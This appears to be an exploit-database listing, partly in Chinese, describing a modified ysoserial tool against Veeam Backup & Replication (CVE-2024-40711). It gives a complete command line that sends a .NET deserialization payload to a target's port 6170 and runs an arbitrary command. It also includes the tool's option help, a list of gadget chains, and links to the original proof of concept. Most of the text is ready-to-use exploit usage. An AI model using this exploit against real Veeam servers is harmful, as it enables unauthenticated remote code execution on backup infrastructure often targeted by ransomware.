Share
## https://sploitus.com/exploit?id=8F3163F4-A918-511B-9906-2420C9711DAB
# 用法

```
.\ysoserial.exe -f BinaryFormatter -g Veeam -c {localhostServer} -vi {targetIP} -vp 6170 -vg DataSet -vc "cmd /c mspaint.exe"
```

```
Usage: ysoserial.exe [options]                                                                                                        
Options:                                                                                                                              
      --vi, --targetveeamip=VALUE                                                                                                     
                             The target Veeam Backup and reaplication IP                                                              
                               address                                                                                                
      --vp, --targetveeamport=VALUE                                                                                                   
                             The target Veeam Backup and reaplication port                                                            
                               (default: 6170)                                                                                        
      --vc, --veeamexpcmd=VALUE                                                                                                       
                             The target Veeam Backup and reaplication what                                                            
                               commands will be executed                                                                              
      --vg, --veeamgadget=VALUE                                                                                                       
                             The target Veeam Backup and reaplication what                                                            
                               gadget will be use (default: DataSet)                                                                  
           
```

![cve-2024-4711](./assets/cve-2024-4711.gif)

其他利用链

```
Supported gadgets are: ActivitySurrogateDisableTypeCheck , ActivitySurrogateSelector , ActivitySurrogateSelectorFromFile , AxHostState , BaseActivationFactory , ClaimsIdentity , ClaimsPrincipal , DataSet , DataSetOldBehaviour , DataSetOldBehaviourFromFile , DataSetTypeSpoof , Generic , GenericPrincipal , GetterCompilerResults , GetterSecurityException , GetterSettingsPropertyValue , ObjectDataProvider , ObjRef , PSObject , ResourceSet , RolePrincipal , SessionSecurityToken , SessionViewStateHistoryItem , TextFormattingRunProperties , ToolboxItemContainer , TypeConfuseDelegate , TypeConfuseDelegateMono , Veeam , WindowsClaimsIdentity , WindowsIdentity , WindowsPrincipal , XamlAssemblyLoadFromFile , XamlImageInfo
```

必须使用SoapFormatter所支持的利用链

# 引用

[watchtowrlabs/CVE-2024-40711: Pre-Auth Exploit for CVE-2024-40711 (github.com)](https://github.com/watchtowrlabs/CVE-2024-40711)

[Veeam Backup & Response - RCE With Auth, But Mostly Without Auth (CVE-2024-40711) (watchtowr.com)](https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/)